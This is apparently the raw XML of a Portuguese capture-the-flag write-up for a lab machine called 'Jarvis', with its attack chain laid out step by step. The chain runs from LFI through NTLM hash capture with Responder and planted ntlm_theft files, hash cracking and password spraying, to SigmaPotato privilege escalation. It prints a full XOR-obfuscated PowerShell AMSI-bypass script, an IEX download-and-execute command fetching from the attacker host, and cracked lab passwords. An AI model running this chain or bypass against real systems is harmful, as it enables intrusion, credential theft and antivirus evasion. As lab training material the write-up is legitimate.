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36gh2so4drvj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n8lqu1if4h0s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Jarvis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zgz570g2y8a2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fase de enumeração, foi realizada a varredura de portas e serviços expostos pelo alvo. A análise identificou diversos serviços acessíveis externamente, indicando uma superfície de ataque ampla. As portas encontradas abertas foram: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80/TCP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HTTP,8000/TCP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–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Web,88/TCP – Kerberos,445/TCP – SMB,389/TCP – LDAP,5985/TCP – WinRM, 3389/TCP – RDP.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Esses representam os serviços mais relevantes identificados durante a varredura inicial, sendo potenciais pontos de interesse para exploração e aprofundamento da análise.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82552"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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55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861925"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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19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análise dos serviços web foi iniciada pela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80/TCP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onde foi possível identificar, na interface principal, um botão denominado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“Jarvis Industries”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sugerindo a existência de funcionalidades adicionais ou páginas internas associadas a esse componente.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03688"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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6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acionar esse botão, o navegador foi redirecionado para o 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jarvis.hc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a presença de um subdomínio adicional vinculada ao ambiente analisado.</w:t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78770"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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77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adicionar este subdomínio ao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Linux para resolução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DNS,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conseguimos acessá-lo diretamente.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75238"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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2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Nesse domínio, havia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botão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chamado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“AI Academy”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ao ser acionado redirecionava o usuário para o subdomínio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academy.jarvis.hc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a existência de outro serviço web complementar ao ambiente analisado.</w:t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64570"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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57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o subdomínio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academy.jarvis.hc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identificada na aplicação web a presença de um parâmetro utilizado para carregar recursos internos. A análise demonstrou que esse parâmetro aceita caminhos de arquivos de forma dinâmica, permitindo referenciar arquivos armazenados no próprio servidor. Esse comportamento caracteriza uma vulnerabilidade do tipo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Local File Inclusion (LFI)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qual pode resultar no acesso não autorizado a arquivos internos do sistema e na exposição de informações sensíveis.</w:t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da vulnerabilidade de inclusão de arquivos locais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(LFI)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acessar arquivos internos do sistema operacional. Entre os artefatos obtidos, destaca-se o arquivo de configuração de hosts do Windows, localizado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C:\Windows\System32\drivers\etc\hosts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demonstrando que o servidor permitia a leitura de componentes sensíveis do ambiente.</w:t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http://academy.jarvis.hc/?page=C:\\Windows\\System32\\drivers\\etc\\hosts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14456"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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45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presença da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Local File Inclusion (LFI)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amplia significativamente a superfície de ataque, pois além de permitir o acesso a arquivos internos, ela pode, em determinadas condições, ser utilizada como vetor para ataques mais avançados. Entre eles, destaca-se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NTLM Relay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ataque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NTLM Relay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ocorre quando um invasor consegue induzir o servidor vulnerável a realizar uma requisição externa que inclua credenciais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NTLM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Quando a aplicação apresenta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LFI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ou funcionalidades de carregamento de recursos que podem ser manipuladas, torna-se possível direcionar essas requisições para um servidor controlado pelo atacante. Ao fazer isso, o atacante captura a hash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NTLM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podendo utilizá-lo para redirecionar essas credenciais para outro serviço interno que aceite autenticação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NTLM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obtendo acesso não autorizado.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capturar a hash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NTLM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enviada pelo servidor, foi necessário configurar um serviço para capturar a hash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NTLM do usuário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Para isto, utilizamos o </w:t>
      </w:r>
      <w:hyperlink r:id="rId1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Responder.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tun0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13413"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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4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possível obter a hash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NTLM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svc_jarvis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por meio da vulnerabilidade associada ao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NTLM Relay.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 aplicação realizou uma tentativa de autenticação no servidor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SMB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controlado pelo pentester, configurado com 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Responder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que permitiu a captura da credencial em formato de hash.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http://academy.jarvis.hc/?page=\\&lt;vpn-ip&gt;\share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75113"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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1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capturar a hash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NTLM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associada ao usuário em questão, confirmando a exploração bem-sucedida da vulnerabilidade.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28700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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utilizado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Hashcat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identificar corretamente o tipo de hash e, em seguida, realizar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quebra de senha por meio de ataque de brute force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--identify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77900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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senha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svc_jarvis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quebrada com sucesso após o processo de brute force.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svc_jarvis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!QAZ2wsx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81300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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as credenciais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svc_jarvis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utilizar o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realizar a enumeração dos usuários existentes na máquinas.</w:t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--dns-server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jarvis.hc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svc_jarvis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'!QAZ2wsx'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{'print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$5'}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svc_jarvis,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P.Parker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,C.Barton,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jalem.bipel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82700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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a ferramenta</w:t>
      </w:r>
      <w:hyperlink r:id="rId23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NetExec </w:t>
        </w:r>
      </w:hyperlink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(nxc)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realizar um ataque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password spray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aplicando a senha descoberta do usuário previamente identificado a outros usuários do ambiente. Esse procedimento permitiu a identificação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mais duas contas válidas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compartilhavam a mesma credencial.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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rdp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'!QAZ2wsx'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--continue-on-success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jarvis.hc\svc_jarvis:!QAZ2wsx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jarvis.hc\P.Parker:!QAZ2wsx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jarvis.hc\C.Barton:!QAZ2wsx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28700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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Repetindo o processo de enumeração de serviços com o novo usuário identificado, verificou-se que, por meio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conta possui permissões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leitura e escrita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compartilhamento denominado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AI_Projects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jarvis.hc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P.Parker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'!QAZ2wsx'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--shares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71600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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P.Parker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tem acesso ao compartilhamento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AI_Projects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Este acesso foi utilizado para plantar arquivos maliciosos visando capturar credenciais de outros usuários da rede.</w:t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Esse ataque aproveita o comportamento padrão do Windows ao acessar arquivos que fazem referência a um recurso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 externo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Quando o usuário abre ou apenas acessa um arquivo que contém um caminho apontando para um compartilhamento remoto, o Windows tenta se autenticar automaticamente nesse recurso. Durante esse processo, o sistema envia as credenciais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NTLM do usuário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que pode resultar na captura do hash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NTLMv2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caso o compartilhamento esteja apontado para um servidor controlado pelo atacante.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005B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ferramenta </w:t>
      </w:r>
      <w:hyperlink r:id="rId2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ntlm_theft.py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utilizada para gerar múltiplos tipos de arquivos que forçam autenticação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NTLM.</w:t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ntlm_theft.py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&lt;vpn-ip&gt;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08400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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ntlm_theft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foram gerados os dois arquivos necessários para acionar o comportamento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autenticação automática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Em seguida, fazemos o upload dos seguintes arquivos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000062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payload.lnk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payload.scf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76400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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Responder foi configurado para capturar tentativas de autenticação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NTLM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direcionadas ao servidor atacante. Dessa forma, foi possível capturar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 NTLM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jalem.bipel.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tun0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60500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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captura da hash do usuário, ela foi armazenada em um arquivo dedicado para posterior tentativa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quebra por brute force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Hashcat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5600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hash2.txt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~/rockyou.txt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65300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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81300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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senha do usuário foi quebrada com sucesso por meio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Hashcat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o acesso à credencial em texto claro.</w:t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jalem.bipel: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babygirl#1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l73vjn2udsz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kzupfug2f60j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credencial e a senha obtidas, foi possível testar o acesso a diversos serviços disponíveis no ambiente. Inicialmente, foi realizada uma tentativa de conexão por meio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WinRM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utilizando o usuário comprometido. Com o usuário e a senha obtidos, foi possível estabelecer uma conexão bem-sucedida ao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WinRM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confirmando o acesso remoto ao sistema.</w:t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evil-winrm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jalem.bipel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'babygirl#1'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97000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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martwd8fn0k7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obter acesso remoto à máquina por meio do WinRM, foi possível enumerar todos os privilégios atribuídos ao usuário utilizando o comando.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whoami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/priv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07799"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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79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execução do comando, foi identificado que o privilégio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SeImpersonatePrivilege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está ativo. Esse privilégio concede a capacidade de assumir temporariamente o contexto de segurança de outro usuário, possibilitando a execução de ações em nome de outro usuário. A partir dessa condição, tornou-se possível escalar privilégios e obter acesso ao usuário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Administrator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Entretanto, como a interface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AMSI (Antimalware Scan Interface)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habilitada por padrão nos sistemas Windows, antes da execução de qualquer script adicional foi necessário realizar seu bypass, uma vez que esse mecanismo é responsável pela verificação e possível bloqueio de códigos potencialmente maliciosos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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aplicação do código de bypass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AMSI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tornou-se possível executar scripts e arquivos potencialmente maliciosos no sistema sem que fossem interceptados pelos mecanismos nativos de verificação antimalware.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008D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script desenvolvido para realizar o bypass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AMSI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contém o seguinte conteúdo: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9sxy8hylu1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Ofuscação por XOR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Script utiliza criptografia XOR (chave "evasive") para ofuscar strings críticas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amsi.dll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AmsiScanBuffer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evitando detecção por análise estática e assinaturas de antivírus.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mxdpthoh31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AMSI Bypass via Memory Patching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Modifica permissões de memória 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VirtualProtect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(flag 0x40)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injeta payload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0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3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nos primeiros 6 bytes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AmsiScanBuffer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Resultado: função sempre retorna erro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E_INVALIDARG, desabilitando o scanning do Windows Defender.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8dox3ts38b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Função de Orquestração (Invoke-SecurityCheck)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Coordena todo o ataque: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inicializa Win32 APIs → localiza amsi.dll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→ obtém endereço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AmsiScanBuffer → aplica patch. Retorna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$true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quando ambiente está comprometido.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function Initialize-SystemHelper {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$SystemHelper = @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 System;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 System.Runtime.InteropServices;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 class SystemHelper {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[DllImport("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kernel32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)]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IntPtr GetProcAddress(IntPtr hModule, string procName);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[DllImport(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"kernel32"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)]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IntPtr LoadLibrary(string name);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Add-Type $SystemHelper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[SystemHelper]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 Get-VirtualProtectDelegate {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param(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[Parameter(Mandatory=$true)]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$SystemClass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$DelegateType = @"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System;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System.Runtime.InteropServices;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delegate bool VirtualProtectDelegate(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);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Add-Type $DelegateType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$Kernel32Module = $SystemClass::LoadLibrary("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kernel32.dll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$VirtualProtectAddress = $SystemClass::GetProcAddress($Kernel32Module,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"VirtualProtect"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($VirtualProtectAddress -eq [IntPtr]::Zero) {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throw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"Failed to get VirtualProtect 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$VirtualProtectDelegate = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(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$VirtualProtectAddress,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[VirtualProtectDelegate]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$VirtualProtectDelegate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function Load-SecurityModule {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param(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[Parameter(Mandatory=$true)]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$SystemClass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$EncryptedRequestUrl = [Byte[]]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0x1B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0x1A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0x47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$XorKey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"evasive"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$RequestUrl = Decode-XORString -EncryptedString $EncryptedRequestUrl -XorKey $XorKey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$Response = $SystemClass::LoadLibrary($RequestUrl)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($Response -eq [IntPtr]::Zero) {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throw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"Failed to load security module"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$Response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function Get-FunctionAddress {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param(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[Parameter(Mandatory=$true)]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$SystemClass,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[Parameter(Mandatory=$true)]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$SecurityModule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$EncryptedMethodName = [Byte[]]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0x1B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0x1A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0x3A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0x0B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0x0F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0x13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0x17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$XorKey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"evasive"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$MethodName = Decode-XORString -EncryptedString $EncryptedMethodName -XorKey $XorKey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$Header = $SystemClass::GetProcAddress($SecurityModule, $MethodName)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($Header -eq [IntPtr]::Zero) {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throw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"Failed to get function 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$Header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function Decode-XORString {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param(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[Parameter(Mandatory=$true)]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[Byte[]]$EncryptedString,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[Parameter(Mandatory=$true)]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[string]$XorKey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$KeyBytes = [System.Text.Encoding]::ASCII.GetBytes($XorKey)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$DecodedBytes = New-Object Byte[] $EncryptedString.Length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($i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$i -lt $EncryptedString.Length; $i++) {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$DecodedBytes[$i] = $EncryptedString[$i] -bxor $KeyBytes[$i % $KeyBytes.Length]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[System.Text.Encoding]::ASCII.GetString($DecodedBytes)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function Decode-XORPayload {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param(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[Parameter(Mandatory=$true)]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[Byte[]]$EncryptedPayload,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[Parameter(Mandatory=$true)]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[string]$XorKey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$KeyBytes = [System.Text.Encoding]::ASCII.GetBytes($XorKey)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$DecodedPayload = New-Object Byte[] $EncryptedPayload.Length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($i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$i -lt $EncryptedPayload.Length; $i++) {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$DecodedPayload[$i] = $EncryptedPayload[$i] -bxor $KeyBytes[$i % $KeyBytes.Length]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$DecodedPayload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function Apply-CodeUpdate {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param(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[Parameter(Mandatory=$true)]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$VirtualProtectFunc,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[Parameter(Mandatory=$true)]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$TargetAddress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$StatusCode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$ProtectionFlags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$Size = [uint32]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$Success = $VirtualProtectFunc.Invoke($TargetAddress, [UIntPtr]$Size, $ProtectionFlags, [ref]$StatusCode)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(-not $Success) {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throw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"Failed to change memory protection"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$EncryptedPayload = [Byte[]]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0xDD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0x61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0x74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0xE9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0xB5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$XorKey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"evasive"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$Payload = Decode-XORPayload -EncryptedPayload $EncryptedPayload -XorKey $XorKey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[System.Runtime.InteropServices.Marshal]::Copy($Payload,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$TargetAddress,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$Success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function Invoke-SecurityCheck {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try {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$SystemClass = Initialize-SystemHelper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$VirtualProtectFunc = Get-VirtualProtectDelegate -SystemClass $SystemClass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$SecurityModule = Load-SecurityModule -SystemClass $SystemClass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$FunctionAddress = Get-FunctionAddress -SystemClass $SystemClass -SecurityModule $SecurityModule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Apply-CodeUpdate -VirtualProtectFunc $VirtualProtectFunc -TargetAddress $FunctionAddress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$true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catch {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Write-Error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"Security check failed: $_"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$false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essa finalidade, o arquivo foi executado por meio de um método de invocação direta de código em memória, utilizando o comando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iex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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="b80672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IEX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(New-Object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System.Net.WebClient).DownloadString(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"http://&lt;your-ip/bypass.ps1"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1300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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invocação desse script diretamente em memória, foi chamada a função responsável por executar o módulo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Invoke-SecurityCheck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retorno do comando apresentou o valor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duas ocasiões, indicando que a execução foi bem-sucedida e que o procedimento foi concluído conforme esperado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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25500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="3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desse ponto, tornou-se possível transferir o arquivo do  </w:t>
      </w:r>
      <w:hyperlink r:id="rId37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SigmaPotato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máquina local para o host comprometido, a fim de prosseguir com a etapa de escalonamento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privilégios.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 arquivo no formato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.ps1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transferido utilizando o comando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PowerShell, após ter sido hospedado em um servidor HTTP simples configurado com Python.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014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&lt;vpn-ip&gt;/Invoke-SigmaPotato.ps1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Invoke-SigmaPotato.ps1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43000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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54100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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se tratar de um script no formato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.ps1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SigmaPotato.ps1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importado para o ambiente a fim de permitir a sua execução em memória.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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.\Invoke-SigmaPotato.ps1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44500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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desse ponto, foi necessário apenas executar o módulo, acionando-o com a chamada de um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whoami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para validar a execução.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015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Invoke-SigmaPotato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"whoami"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87600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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a saída do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whoami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o contexto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NT AUTHORITY\SYSTEM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confirmando que a execução ocorreu com privilégios elevados. Dessa forma, ficou evidenciado o sucesso no processo de escalonamento de privilégios, resultando em acesso administrativo ao sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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possível obter acesso ao usuário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Administrator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caracterizando o nível máximo de privilégio no sistema. A partir desse ponto, tornou-se viável executar um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.bat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objetivo de alterar a senha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próprio usuário administrador.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000158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Set-Content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password.bat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Administrator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NovaSenha123!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0200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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criação do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.bat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script de alteração de senha foi fornecido como argumento ao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SigmaPotato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execução com privilégios elevados.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015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Invoke-SigmaPotato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C:\Users\TEMP.JARVIS\Documents\password.bat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33600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="3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i w:val="1"/>
          <w:iCs w:val="1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alteração da senha, como o usuário possui privilégios para autenticação via WinRM, foi estabelecida uma nova conexão remota utilizando as credenciais atualizadas.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evil-winrm.rb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administrator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'NovaSenha123!'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44600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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Com isso, foi possível pegar a última flag em C:\Users\Administrator\Desktop.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ectPr>
      <w:headerReference r:id="rId45" w:type="default"/>
      <w:headerReference r:id="rId46" w:type="first"/>
      <w:headerReference r:id="rId47" w:type="even"/>
      <w:footerReference r:id="rId48" w:type="default"/>
      <w:footerReference r:id="rId49" w:type="first"/>
      <w:footerReference r:id="rId50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B">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.eqcnr7mz12v" w:id="9"/>
    <w:bookmarkEnd w:id="9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69" name="image26.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image26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6C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D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67" name="image25.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image2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3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Jarvis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36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42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml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48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId4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hackingclub.com/laboratory/competition-machines/292#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22.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/tylerdotrar/SigmaPotato/blob/main/Invoke-SigmaPotato.ps1" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.netexec.wiki/" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.netexec.wiki/" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Greenwolf/ntlm_theft" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/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hyperlink" Target="https://github.com/SpiderLabs/Responder" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30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6.jpg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3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9J0pkUyE9lvWh7KHHIkz4Q9AZw==">CgMxLjAyDmguMzZnaDJzbzRkcnZqMg5oLm44bHF1MWlmNGgwczIOaC56Z3o1NzBnMnk4YTIyDmgubDczdmpuMnVkc3phMg5oLmt6dXBmdWcyZjYwajIOaC5tYXJ0d2Q4Zm4wazcyDmguZjlzeHk4aHlsdTFpMg5oLjRteGRwdGhvaDMxZTIOaC5mOGRveDN0czM4YmgyDWguZXFjbnI3bXoxMnY4AHIhMUluRmRvSFhQMDkwMnh6R2xNNDl3SmdLU0hXY3A5amg1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